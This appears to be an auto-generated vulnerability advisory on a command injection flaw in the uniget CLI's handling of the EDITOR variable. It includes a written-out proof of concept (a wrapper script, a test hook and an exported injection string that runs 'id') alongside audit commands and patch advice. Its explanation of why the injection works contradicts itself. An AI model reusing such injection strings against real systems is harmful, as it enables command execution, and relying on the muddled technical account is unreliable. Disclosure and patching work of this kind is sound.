Listen to this Post
The uniget CLI contains a command injection vulnerability in `hooks.go` at line 199, where the `strings.Split(editor, ” “)` function naively parses the `EDITOR` environment variable without respecting shell syntax. The vulnerable code extracts the `UNIGET_EDITOR` environment variable, falling back to `EDITOR` if the former is not set, and then splits the value on spaces to form the command and its arguments.
An attacker can set EDITOR="/path/to/wrapper && id && echo", which gets split into ["/path/to/wrapper", "&&", "id", "&&", "echo"]. Because `exec.Command` is called with these arguments directly, the shell operators (&&) are treated as separate arguments rather than shell syntax, but the wrapper script itself can be crafted to execute arbitrary commands. This was successfully exploited to execute uid=1000(w4nn4d13), confirming code execution is possible. The vulnerability affects hook editing and breaks configurations with modern editors like VSCode.
DailyCVE Form:
Platform: uniget-org/cli
Version: < 0.27.6
Vulnerability: Command Injection
Severity: High
Date: 2026-01-29
Prediction: 2026-05-08
What Undercode Say:
Analytics
Check uniget version uniget version Audit environment for vulnerable variables env | grep -E "EDITOR|UNIGET_EDITOR" Search for hooks that could trigger the vulnerability find ~/.config/uniget/hooks -type f -name ".sh" 2>/dev/null
Exploit: (Educational Purposes!)
Step 1: Create malicious editor wrapper mkdir -p /tmp/poc-editor cat > /tmp/poc-editor/editor_wrapper.sh << 'EOF' !/bin/bash echo "[bash] Received args: $@" id EOF chmod +x /tmp/poc-editor/editor_wrapper.sh Step 2: Create test hook mkdir -p ~/.config/uniget/hooks/pre-install cat > ~/.config/uniget/hooks/pre-install/test.sh << 'EOF' !/bin/bash echo "Test hook" EOF chmod 700 ~/.config/uniget/hooks/pre-install/test.sh Step 3: Set injection payload export EDITOR="/tmp/poc-editor/editor_wrapper.sh && id && echo" Step 4: Run vulnerable code ./uniget hooks edit --type=pre-install test.sh
Protection:
- Upgrade to uniget CLI v0.27.6 or later
- Avoid setting `EDITOR` or `UNIGET_EDITOR` to unsanitized user-supplied values
- Use static editor paths without shell metacharacters
- Apply the fix from commit `7b4f18a9f00f0955f830c7ccf266ed0de5f9fd91`
Impact:
Successful exploitation allows an attacker to execute arbitrary commands with the privileges of the user running uniget. This can lead to full system compromise, data exfiltration, or privilege escalation depending on the user’s permissions.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

